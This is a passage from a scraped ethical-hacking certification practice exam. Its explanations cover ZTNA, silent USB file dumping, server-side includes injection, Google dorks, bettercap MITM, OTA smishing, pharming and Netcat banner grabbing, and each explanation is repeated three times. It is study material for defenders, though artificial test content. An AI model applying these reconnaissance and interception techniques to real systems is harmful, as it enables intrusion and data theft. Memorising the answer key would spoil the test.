providers, including Amazon Web Services, Microsoft Azure and Google Cloud Platform have embraced container technology, with container software having names including the popular choices of Docker, Apache Mesos, rkt (pronounced rocket), and Kubernetes.
Unattempted
https://en.wikipedia.org/wiki/Zero_trust_security_model Zero Trust Network Access (ZTNA) is a category of technologies that provides secure remote access to applications and services based on defined access control policies. Unlike VPNs, which grant complete access to a LAN, ZTNA solutions default to deny, providing only the access to services the user has been explicitly granted. Incorrect answers: DMZ https://en.wikipedia.org/wiki/DMZ_(computing) DMZ or demilitarized zone (sometimes referred to as a perimeter network or screened subnet) is a physical or logical subnetwork that contains and exposes an organization‘s external-facing services to an untrusted, usually larger, network such as the Internet. The purpose of a DMZ is to add an additional layer of security to an organization‘s local area network (LAN): an external network node can access only what is exposed in the DMZ, while the rest of the organization‘s network is firewalled. The DMZ functions as a small, isolated network positioned between the Internet and the private network. Serverless computing https://en.wikipedia.org/wiki/Serverless_computing Serverless computing is a cloud computing execution model in which the cloud provider allocates machine resources on demand, taking care of the servers on behalf of their customers. Serverless computing does not hold resources in volatile memory; computing is rather done in short bursts with the results persisted to storage. When an app is not in use, there are no computing resources allocated to the app. Pricing is based on the actual amount of resources consumed by an application. It can be a form of utility computing. “Serverless“ is a misnomer in the sense that servers are still used by cloud service providers to execute code for developers. Container technology Container technology, also simply known as just a container, is a method to package an application so it can be run, with its dependencies, isolated from other processes. The major public cloud computing providers, including Amazon Web Services, Microsoft Azure and Google Cloud Platform have embraced container technology, with container software having names including the popular choices of Docker, Apache Mesos, rkt (pronounced rocket), and Kubernetes.
Question 56 of 65
56. Question
Which of the following USB tools using to copy files from USB devices silently?
Correct
https://www.ghacks.net/2006/09/15/how-to-dump-all-usb-files-without-the-user-knowing/ USBdumper runs silently as a background process once started and copies the complete contents of every connected usb device to the system without the knowledge of the user. It creates a directory with the current date and begins the background copying process. The user has no indication that the files stored on the USB device are copied from the USB to the local system.
Incorrect
https://www.ghacks.net/2006/09/15/how-to-dump-all-usb-files-without-the-user-knowing/ USBdumper runs silently as a background process once started and copies the complete contents of every connected usb device to the system without the knowledge of the user. It creates a directory with the current date and begins the background copying process. The user has no indication that the files stored on the USB device are copied from the USB to the local system.
Unattempted
https://www.ghacks.net/2006/09/15/how-to-dump-all-usb-files-without-the-user-knowing/ USBdumper runs silently as a background process once started and copies the complete contents of every connected usb device to the system without the knowledge of the user. It creates a directory with the current date and begins the background copying process. The user has no indication that the files stored on the USB device are copied from the USB to the local system.
Question 57 of 65
57. Question
Andrew, an evil hacker, research the website of the company which he wants to attack. During the research, he finds a web page and understands that the company‘s application is potentially vulnerable to Server-side Includes Injection. Which web-page file type did Andrew find while researching the site?
Correct
https://medium.com/@briskinfosec/server-side-includes-injection-4b2b624393c7 SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the webserver analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields. It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like: < ! # = / . “ - > and [a-zA-Z0-9] Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these types of pages does not mean that the application is protected against SSI attacks. In any case, the attack will be successful only if the webserver permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the webserver process owner.
Incorrect
https://medium.com/@briskinfosec/server-side-includes-injection-4b2b624393c7 SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the webserver analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields. It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like: < ! # = / . “ - > and [a-zA-Z0-9] Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these types of pages does not mean that the application is protected against SSI attacks. In any case, the attack will be successful only if the webserver permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the webserver process owner.
Unattempted
https://medium.com/@briskinfosec/server-side-includes-injection-4b2b624393c7 SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the webserver analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields. It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like: < ! # = / . “ - > and [a-zA-Z0-9] Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these types of pages does not mean that the application is protected against SSI attacks. In any case, the attack will be successful only if the webserver permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the webserver process owner.
Question 58 of 65
58. Question
Alex was assigned to perform a penetration test against a website using Google dorks. He needs to get results with file extensions. Which operator should Alex use to achieve the desired result?
Correct
https://ahrefs.com/blog/google-advanced-search-operators/ filetype: Restrict results to those of a certain filetype. E.g., PDF, DOCX, TXT, PPT, etc. Note: The ext: operator can also be usedthe results are identical. Incorrect answers: site: If you include [site:] in your query, Google will restrict the results to those websites in the given domain. inurl: Find pages with a certain word (or words) in the URL. For this example, any results containing the word apple in the URL will be returned. define: A dictionary built into Google, basically. This will display the meaning of a word in a card-like result in the SERPs.
Incorrect
https://ahrefs.com/blog/google-advanced-search-operators/ filetype: Restrict results to those of a certain filetype. E.g., PDF, DOCX, TXT, PPT, etc. Note: The ext: operator can also be usedthe results are identical. Incorrect answers: site: If you include [site:] in your query, Google will restrict the results to those websites in the given domain. inurl: Find pages with a certain word (or words) in the URL. For this example, any results containing the word apple in the URL will be returned. define: A dictionary built into Google, basically. This will display the meaning of a word in a card-like result in the SERPs.
Unattempted
https://ahrefs.com/blog/google-advanced-search-operators/ filetype: Restrict results to those of a certain filetype. E.g., PDF, DOCX, TXT, PPT, etc. Note: The ext: operator can also be usedthe results are identical. Incorrect answers: site: If you include [site:] in your query, Google will restrict the results to those websites in the given domain. inurl: Find pages with a certain word (or words) in the URL. For this example, any results containing the word apple in the URL will be returned. define: A dictionary built into Google, basically. This will display the meaning of a word in a card-like result in the SERPs.
Question 59 of 65
59. Question
You have been instructed to organize the possibility of working remotely for employees. Their remote connections could be exposed to session hijacking during the work, and you want to prevent this possibility. You decide to use the technology that creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information and prevent hackers from decrypting the data flow between the endpoints. Which of the following technologies will you use?
Correct
https://en.wikipedia.org/wiki/Virtual_private_network A virtual private network (VPN) extends a private network across a public network and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network. The benefits of a VPN include increases in functionality, security, and management of the private network. It provides access to resources inaccessible on the public network and is typically used for telecommuting workers. Encryption is common, although not an inherent part of a VPN connection. A VPN is created by establishing a virtual point-to-point connection through the use of dedicated circuits or with tunnelling protocols over existing networks. A VPN available from the public Internet can provide some of the benefits of a wide area network (WAN). From a user perspective, the resources available within the private network can be accessed remotely. Incorrect answers: Split tunneling https://en.wikipedia.org/wiki/Split_tunneling Split tunneling is a computer networking concept which allows a user to access dissimilar security domains like a public network (e.g., the Internet) and a local LAN or WAN at the same time, using the same or different network connections. This connection state is usually facilitated through the simultaneous use of a Local Area Network (LAN) Network Interface Card (NIC), radio NIC, Wireless Local Area Network (WLAN) NIC, and VPN client software application without the benefit of access control. DMZ https://en.wikipedia.org/wiki/DMZ_(computing) DMZ or demilitarized zone (sometimes referred to as a perimeter network or screened subnet) is a physical or logical subnetwork that contains and exposes an organization‘s external-facing services to an untrusted, usually larger, network such as the Internet. The purpose of a DMZ is to add an additional layer of security to an organization‘s local area network (LAN): an external network node can access only what is exposed in the DMZ, while the rest of the organization‘s network is firewalled. The DMZ functions as a small, isolated network positioned between the Internet and the private network. Bastion host https://en.wikipedia.org/wiki/Bastion_host A bastion host is a special-purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application or process, for example, a proxy server or load balancer, and all other services are removed or limited to reduce the threat to the computer. It is hardened in this manner primarily due to its location and purpose, which is either on the outside of a firewall or inside of a demilitarized zone (DMZ) and usually involves access from untrusted networks or computers. These computers are also equipped with special networking interfaces to withstand high-bandwidth attacks through the internet.
Incorrect
https://en.wikipedia.org/wiki/Virtual_private_network A virtual private network (VPN) extends a private network across a public network and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network. The benefits of a VPN include increases in functionality, security, and management of the private network. It provides access to resources inaccessible on the public network and is typically used for telecommuting workers. Encryption is common, although not an inherent part of a VPN connection. A VPN is created by establishing a virtual point-to-point connection through the use of dedicated circuits or with tunnelling protocols over existing networks. A VPN available from the public Internet can provide some of the benefits of a wide area network (WAN). From a user perspective, the resources available within the private network can be accessed remotely. Incorrect answers: Split tunneling https://en.wikipedia.org/wiki/Split_tunneling Split tunneling is a computer networking concept which allows a user to access dissimilar security domains like a public network (e.g., the Internet) and a local LAN or WAN at the same time, using the same or different network connections. This connection state is usually facilitated through the simultaneous use of a Local Area Network (LAN) Network Interface Card (NIC), radio NIC, Wireless Local Area Network (WLAN) NIC, and VPN client software application without the benefit of access control. DMZ https://en.wikipedia.org/wiki/DMZ_(computing) DMZ or demilitarized zone (sometimes referred to as a perimeter network or screened subnet) is a physical or logical subnetwork that contains and exposes an organization‘s external-facing services to an untrusted, usually larger, network such as the Internet. The purpose of a DMZ is to add an additional layer of security to an organization‘s local area network (LAN): an external network node can access only what is exposed in the DMZ, while the rest of the organization‘s network is firewalled. The DMZ functions as a small, isolated network positioned between the Internet and the private network. Bastion host https://en.wikipedia.org/wiki/Bastion_host A bastion host is a special-purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application or process, for example, a proxy server or load balancer, and all other services are removed or limited to reduce the threat to the computer. It is hardened in this manner primarily due to its location and purpose, which is either on the outside of a firewall or inside of a demilitarized zone (DMZ) and usually involves access from untrusted networks or computers. These computers are also equipped with special networking interfaces to withstand high-bandwidth attacks through the internet.
Unattempted
https://en.wikipedia.org/wiki/Virtual_private_network A virtual private network (VPN) extends a private network across a public network and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network. The benefits of a VPN include increases in functionality, security, and management of the private network. It provides access to resources inaccessible on the public network and is typically used for telecommuting workers. Encryption is common, although not an inherent part of a VPN connection. A VPN is created by establishing a virtual point-to-point connection through the use of dedicated circuits or with tunnelling protocols over existing networks. A VPN available from the public Internet can provide some of the benefits of a wide area network (WAN). From a user perspective, the resources available within the private network can be accessed remotely. Incorrect answers: Split tunneling https://en.wikipedia.org/wiki/Split_tunneling Split tunneling is a computer networking concept which allows a user to access dissimilar security domains like a public network (e.g., the Internet) and a local LAN or WAN at the same time, using the same or different network connections. This connection state is usually facilitated through the simultaneous use of a Local Area Network (LAN) Network Interface Card (NIC), radio NIC, Wireless Local Area Network (WLAN) NIC, and VPN client software application without the benefit of access control. DMZ https://en.wikipedia.org/wiki/DMZ_(computing) DMZ or demilitarized zone (sometimes referred to as a perimeter network or screened subnet) is a physical or logical subnetwork that contains and exposes an organization‘s external-facing services to an untrusted, usually larger, network such as the Internet. The purpose of a DMZ is to add an additional layer of security to an organization‘s local area network (LAN): an external network node can access only what is exposed in the DMZ, while the rest of the organization‘s network is firewalled. The DMZ functions as a small, isolated network positioned between the Internet and the private network. Bastion host https://en.wikipedia.org/wiki/Bastion_host A bastion host is a special-purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application or process, for example, a proxy server or load balancer, and all other services are removed or limited to reduce the threat to the computer. It is hardened in this manner primarily due to its location and purpose, which is either on the outside of a firewall or inside of a demilitarized zone (DMZ) and usually involves access from untrusted networks or computers. These computers are also equipped with special networking interfaces to withstand high-bandwidth attacks through the internet.
Question 60 of 65
60. Question
Are you sure your network is perfectly protected and no evil hacker Ivan listens to all your traffic? What, ignorance is the greatest source of happiness. There is a powerful tool written in Go that will allow an attacker to carry out a Man in the middle (MITM) attack using, for example, ordinary arp spoofing. What kind of tool are we talking about?
Correct
https://www.bettercap.org/ bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks. One of the main feature is: · ARP, DNS, NDP and DHCPv6 spoofers for MITM attacks on IPv4 and IPv6 based networks. Incorrect answers: Wireshark https://www.wireshark.org/ Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. DerpNSpoof https://github.com/Trackbool/DerpNSpoof Simple DNS Spoofing tool made in Python 3 with Scapy. Gobbler http://gobbler.sourceforge.net/ Spoofed remote OS detection tool.
Incorrect
https://www.bettercap.org/ bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks. One of the main feature is: · ARP, DNS, NDP and DHCPv6 spoofers for MITM attacks on IPv4 and IPv6 based networks. Incorrect answers: Wireshark https://www.wireshark.org/ Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. DerpNSpoof https://github.com/Trackbool/DerpNSpoof Simple DNS Spoofing tool made in Python 3 with Scapy. Gobbler http://gobbler.sourceforge.net/ Spoofed remote OS detection tool.
Unattempted
https://www.bettercap.org/ bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks. One of the main feature is: · ARP, DNS, NDP and DHCPv6 spoofers for MITM attacks on IPv4 and IPv6 based networks. Incorrect answers: Wireshark https://www.wireshark.org/ Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. DerpNSpoof https://github.com/Trackbool/DerpNSpoof Simple DNS Spoofing tool made in Python 3 with Scapy. Gobbler http://gobbler.sourceforge.net/ Spoofed remote OS detection tool.
Question 61 of 65
61. Question
Lisandro was hired to steal critical business documents of a competitor company. Using a vulnerability in over-the-air programming (OTA programming) on Android smartphones, he sends messages to company employees on behalf of the network operator, asking them to enter a PIN code and accept new updates for the phone. After the employee enters the PIN code, Lisandro gets the opportunity to intercept all Internet traffic from the phone. What type of attack did Lisandro use?
Correct
https://en.wikipedia.org/wiki/Over-the-air_programming An over-the-air (OTA) update is the wireless delivery of new software, firmware, or other data to mobile devices. This technology has grown more prominent with the growth of mobile devices and applications. Mobile operators and telecommunication third parties can send OTA updates through SMS to configure data updates in SIM cards, distribute system updates, or access services, such as wireless access protocol (WAP) or multimedia messaging service (MMS). OTA updates also enable mobile operators to activate user subscriptions. OEMs can use OTA updates to fix bugs through firmware and change the user interface. The proliferation of IoT has led manufacturers to use OTA updates for autonomous vehicles, smart home speakers, and other IoT devices. The following link presents an investigation by Check Point Researchers: Advanced SMS Phishing Attacks Against Modern Android-based Smartphones A security flaw in Samsung, LG, Sony, Huawei and other Android smartphones has been discovered that leaves users vulnerable to advanced SMS phishing attacks, Check Point Research — the threat intelligence arm of cybersecurity firm Check Point Software Technologies Ltd. said on Thursday. Researchers at the cybersecurity firm said certain Samsung phones are the most vulnerable to this form of phishing attack because they do not have an authenticity check for senders of Open Mobile Alliance Client Provisioning (OMA CP) messages. The affected Android phones use OTA provisioning, through which cellular network operators can deploy network-specific settings to a new phone joining their network. However, researchers at Check Point found that the industry standard for OTA provisioning — the OMA CP, includes limited authentication methods and remote agents can exploit this to pose as network operators and send deceptive OMA CP messages to users. The message tricks users into accepting malicious settings that route their Internet traffic through a proxy server owned by the hacker. NOTE: For the exam, it is enough just to know about this type of attack, but I advise you to read the full investigation – it is very interesting. This vulnerability affected a lot of Android phones, but it was quickly discovered and vendors released patches to fix it. Nevertheless, this vulnerability gave rise to a new level of smishing attacks – Advanced SMS Phishing.
Incorrect
https://en.wikipedia.org/wiki/Over-the-air_programming An over-the-air (OTA) update is the wireless delivery of new software, firmware, or other data to mobile devices. This technology has grown more prominent with the growth of mobile devices and applications. Mobile operators and telecommunication third parties can send OTA updates through SMS to configure data updates in SIM cards, distribute system updates, or access services, such as wireless access protocol (WAP) or multimedia messaging service (MMS). OTA updates also enable mobile operators to activate user subscriptions. OEMs can use OTA updates to fix bugs through firmware and change the user interface. The proliferation of IoT has led manufacturers to use OTA updates for autonomous vehicles, smart home speakers, and other IoT devices. The following link presents an investigation by Check Point Researchers: Advanced SMS Phishing Attacks Against Modern Android-based Smartphones A security flaw in Samsung, LG, Sony, Huawei and other Android smartphones has been discovered that leaves users vulnerable to advanced SMS phishing attacks, Check Point Research — the threat intelligence arm of cybersecurity firm Check Point Software Technologies Ltd. said on Thursday. Researchers at the cybersecurity firm said certain Samsung phones are the most vulnerable to this form of phishing attack because they do not have an authenticity check for senders of Open Mobile Alliance Client Provisioning (OMA CP) messages. The affected Android phones use OTA provisioning, through which cellular network operators can deploy network-specific settings to a new phone joining their network. However, researchers at Check Point found that the industry standard for OTA provisioning — the OMA CP, includes limited authentication methods and remote agents can exploit this to pose as network operators and send deceptive OMA CP messages to users. The message tricks users into accepting malicious settings that route their Internet traffic through a proxy server owned by the hacker. NOTE: For the exam, it is enough just to know about this type of attack, but I advise you to read the full investigation – it is very interesting. This vulnerability affected a lot of Android phones, but it was quickly discovered and vendors released patches to fix it. Nevertheless, this vulnerability gave rise to a new level of smishing attacks – Advanced SMS Phishing.
Unattempted
https://en.wikipedia.org/wiki/Over-the-air_programming An over-the-air (OTA) update is the wireless delivery of new software, firmware, or other data to mobile devices. This technology has grown more prominent with the growth of mobile devices and applications. Mobile operators and telecommunication third parties can send OTA updates through SMS to configure data updates in SIM cards, distribute system updates, or access services, such as wireless access protocol (WAP) or multimedia messaging service (MMS). OTA updates also enable mobile operators to activate user subscriptions. OEMs can use OTA updates to fix bugs through firmware and change the user interface. The proliferation of IoT has led manufacturers to use OTA updates for autonomous vehicles, smart home speakers, and other IoT devices. The following link presents an investigation by Check Point Researchers: Advanced SMS Phishing Attacks Against Modern Android-based Smartphones A security flaw in Samsung, LG, Sony, Huawei and other Android smartphones has been discovered that leaves users vulnerable to advanced SMS phishing attacks, Check Point Research — the threat intelligence arm of cybersecurity firm Check Point Software Technologies Ltd. said on Thursday. Researchers at the cybersecurity firm said certain Samsung phones are the most vulnerable to this form of phishing attack because they do not have an authenticity check for senders of Open Mobile Alliance Client Provisioning (OMA CP) messages. The affected Android phones use OTA provisioning, through which cellular network operators can deploy network-specific settings to a new phone joining their network. However, researchers at Check Point found that the industry standard for OTA provisioning — the OMA CP, includes limited authentication methods and remote agents can exploit this to pose as network operators and send deceptive OMA CP messages to users. The message tricks users into accepting malicious settings that route their Internet traffic through a proxy server owned by the hacker. NOTE: For the exam, it is enough just to know about this type of attack, but I advise you to read the full investigation – it is very interesting. This vulnerability affected a lot of Android phones, but it was quickly discovered and vendors released patches to fix it. Nevertheless, this vulnerability gave rise to a new level of smishing attacks – Advanced SMS Phishing.
Question 62 of 65
62. Question
Black-hat hacker Ivan attacked a large DNS server. By poisoning the cache, he was able to redirect the online store‘s traffic to a phishing site. Users did not notice the problem and believed that they were on the store‘s actual website, so they entered the data of their accounts and even bank cards. Before the security system had time to react, Ivan collected a large amount of critical user data. Which option is best suited to describe this attack?
Correct
https://csrc.nist.gov/glossary/term/pharming An attack in which an attacker corrupts an infrastructure service such as DNS (Domain Name System), causing the subscriber to be misdirected to a forged verifier/RP, which could cause the subscriber to reveal sensitive information, download harmful software, or contribute to a fraudulent act. There are a couple of different forms of pharming. In one form, code sent in an email modifies local host files on a PC. The host files convert Uniform Resource Locators (URLs) into the IP address that the computer uses to access websites. A computer with a compromised host file will go to the fake site even if a user types in the correct web address or clicks on an affected bookmark entry. Another pharming tactic is DNS poisoning. The DNS table in a server is modified, so someone who thinks they are accessing legitimate websites is directed toward fraudulent ones. In this method of pharming, individual PC host files don‘t need to be corrupted. Instead, the problem occurs in the DNS server, which handles millions of internet users‘ URL requests. Victims then end up at a bogus site without any visible indicator of a discrepancy. Incorrect answers: Spear-phishing https://en.wikipedia.org/wiki/Phishing#Spear_phishing Spear phishing involves an attacker directly targeting a specific organization or person with tailored phishing emails. This is essentially the creation and sending of emails to a particular person to make the person think the email is legitimate. In contrast to bulk phishing, spear phishing attackers often gather and use personal information about their target to increase their probability of success of the attack. Phishing https://en.wikipedia.org/wiki/Phishing Phishing is a type of social engineering where an attacker sends a fraudulent (“spoofed“) message designed to trick a human victim into revealing sensitive information to the attacker or to deploy malicious software on the victim‘s infrastructure like ransomware. SPIT attack https://en.wikipedia.org/wiki/VoIP_spam VoIP spam or SPIT (spam over Internet telephony) is unsolicited, automatically dialed telephone calls, typically using voice over Internet Protocol (VoIP) technology. VoIP systems, like e-mail and other Internet applications, are susceptible to abuse by malicious parties who initiate unsolicited and unwanted communications, such as telemarketers and prank callers.
Incorrect
https://csrc.nist.gov/glossary/term/pharming An attack in which an attacker corrupts an infrastructure service such as DNS (Domain Name System), causing the subscriber to be misdirected to a forged verifier/RP, which could cause the subscriber to reveal sensitive information, download harmful software, or contribute to a fraudulent act. There are a couple of different forms of pharming. In one form, code sent in an email modifies local host files on a PC. The host files convert Uniform Resource Locators (URLs) into the IP address that the computer uses to access websites. A computer with a compromised host file will go to the fake site even if a user types in the correct web address or clicks on an affected bookmark entry. Another pharming tactic is DNS poisoning. The DNS table in a server is modified, so someone who thinks they are accessing legitimate websites is directed toward fraudulent ones. In this method of pharming, individual PC host files don‘t need to be corrupted. Instead, the problem occurs in the DNS server, which handles millions of internet users‘ URL requests. Victims then end up at a bogus site without any visible indicator of a discrepancy. Incorrect answers: Spear-phishing https://en.wikipedia.org/wiki/Phishing#Spear_phishing Spear phishing involves an attacker directly targeting a specific organization or person with tailored phishing emails. This is essentially the creation and sending of emails to a particular person to make the person think the email is legitimate. In contrast to bulk phishing, spear phishing attackers often gather and use personal information about their target to increase their probability of success of the attack. Phishing https://en.wikipedia.org/wiki/Phishing Phishing is a type of social engineering where an attacker sends a fraudulent (“spoofed“) message designed to trick a human victim into revealing sensitive information to the attacker or to deploy malicious software on the victim‘s infrastructure like ransomware. SPIT attack https://en.wikipedia.org/wiki/VoIP_spam VoIP spam or SPIT (spam over Internet telephony) is unsolicited, automatically dialed telephone calls, typically using voice over Internet Protocol (VoIP) technology. VoIP systems, like e-mail and other Internet applications, are susceptible to abuse by malicious parties who initiate unsolicited and unwanted communications, such as telemarketers and prank callers.
Unattempted
https://csrc.nist.gov/glossary/term/pharming An attack in which an attacker corrupts an infrastructure service such as DNS (Domain Name System), causing the subscriber to be misdirected to a forged verifier/RP, which could cause the subscriber to reveal sensitive information, download harmful software, or contribute to a fraudulent act. There are a couple of different forms of pharming. In one form, code sent in an email modifies local host files on a PC. The host files convert Uniform Resource Locators (URLs) into the IP address that the computer uses to access websites. A computer with a compromised host file will go to the fake site even if a user types in the correct web address or clicks on an affected bookmark entry. Another pharming tactic is DNS poisoning. The DNS table in a server is modified, so someone who thinks they are accessing legitimate websites is directed toward fraudulent ones. In this method of pharming, individual PC host files don‘t need to be corrupted. Instead, the problem occurs in the DNS server, which handles millions of internet users‘ URL requests. Victims then end up at a bogus site without any visible indicator of a discrepancy. Incorrect answers: Spear-phishing https://en.wikipedia.org/wiki/Phishing#Spear_phishing Spear phishing involves an attacker directly targeting a specific organization or person with tailored phishing emails. This is essentially the creation and sending of emails to a particular person to make the person think the email is legitimate. In contrast to bulk phishing, spear phishing attackers often gather and use personal information about their target to increase their probability of success of the attack. Phishing https://en.wikipedia.org/wiki/Phishing Phishing is a type of social engineering where an attacker sends a fraudulent (“spoofed“) message designed to trick a human victim into revealing sensitive information to the attacker or to deploy malicious software on the victim‘s infrastructure like ransomware. SPIT attack https://en.wikipedia.org/wiki/VoIP_spam VoIP spam or SPIT (spam over Internet telephony) is unsolicited, automatically dialed telephone calls, typically using voice over Internet Protocol (VoIP) technology. VoIP systems, like e-mail and other Internet applications, are susceptible to abuse by malicious parties who initiate unsolicited and unwanted communications, such as telemarketers and prank callers.
Question 63 of 65
63. Question
Which of the following is an anonymizer that masks real IP addresses and ensures complete and continuous anonymity for all online activities?
Correct
I know that this question looks very strange. However, you may come across a question on this topic on the exam. In order to answer it, it is enough to know which of the following is a service for anonymous surfing. https://www.guardster.com/ “Guardster offers various services to let you use the Internet anonymously and securely. From our popular free web proxy service, to our secure SSH tunnel proxy, we have a variety of services to suit your needs.“
Incorrect
I know that this question looks very strange. However, you may come across a question on this topic on the exam. In order to answer it, it is enough to know which of the following is a service for anonymous surfing. https://www.guardster.com/ “Guardster offers various services to let you use the Internet anonymously and securely. From our popular free web proxy service, to our secure SSH tunnel proxy, we have a variety of services to suit your needs.“
Unattempted
I know that this question looks very strange. However, you may come across a question on this topic on the exam. In order to answer it, it is enough to know which of the following is a service for anonymous surfing. https://www.guardster.com/ “Guardster offers various services to let you use the Internet anonymously and securely. From our popular free web proxy service, to our secure SSH tunnel proxy, we have a variety of services to suit your needs.“
Question 64 of 65
64. Question
Alex, a security engineer, needs to determine how much information can be obtained from the firm‘s public-facing web servers. First of all, he decides to use Netcat to port 80 and receive the following output: HTTP/1.1 200 OK – Server: Microsoft-IIS/6 – Expires: Tue, 17 Jan 2011 01:41:33 GMT Date: Mon, 16 Jan 2011 01:41:33 GMT Content-Type: text/html – Accept-Ranges: bytes – Last Modified: Wed, 28 Dec 2010 15:32:21 GMT ETag:“b0aac0542e25c31:89d“ Content-Length: 7369 – Which of the following did Alex do?
Correct
https://en.wikipedia.org/wiki/Banner_grabbing Banner Grabbing is a technique used to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. However, an intruder can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits. Some examples of service ports used for banner grabbing are those used by Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 respectively. Tools commonly used to perform banner grabbing are Telnet, Nmap and Netcat. For example, one could establish a connection to a target web server using Netcat, then send an HTTP request. The response will typically contain information about the service running on the host: [root@prober]# nc http://www.targethost.com 80 HEAD / HTTP/1.1 HTTP/1.1 200 OK Date: Mon, 11 May 2009 22:10:40 EST Server: Apache/2.0.46 (Unix) (Red Hat/Linux) Last-Modified: Thu, 16 Apr 2009 11:20:14 PST ETag: “1986-69b-123a4bc6“ Accept-Ranges: bytes Content-Length: 1110 Connection: close Content-Type: text/html Incorrect answers: SQL injection https://en.wikipedia.org/wiki/SQL_injection SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application‘s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. Cross-site scripting https://en.wikipedia.org/wiki/Cross-site_scripting Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec up until 2007. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site‘s owner network. Cross-Site Request Forgery https://en.wikipedia.org/wiki/Cross-site_request_forgery Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts. There are many ways in which a malicious website can transmit such commands; specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests, for example, can all work without the user‘s interaction or even knowledge. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user‘s browser. In a CSRF attack, an innocent end-user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user‘s account.
Incorrect
https://en.wikipedia.org/wiki/Banner_grabbing Banner Grabbing is a technique used to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. However, an intruder can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits. Some examples of service ports used for banner grabbing are those used by Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 respectively. Tools commonly used to perform banner grabbing are Telnet, Nmap and Netcat. For example, one could establish a connection to a target web server using Netcat, then send an HTTP request. The response will typically contain information about the service running on the host: [root@prober]# nc http://www.targethost.com 80 HEAD / HTTP/1.1 HTTP/1.1 200 OK Date: Mon, 11 May 2009 22:10:40 EST Server: Apache/2.0.46 (Unix) (Red Hat/Linux) Last-Modified: Thu, 16 Apr 2009 11:20:14 PST ETag: “1986-69b-123a4bc6“ Accept-Ranges: bytes Content-Length: 1110 Connection: close Content-Type: text/html Incorrect answers: SQL injection https://en.wikipedia.org/wiki/SQL_injection SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application‘s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not 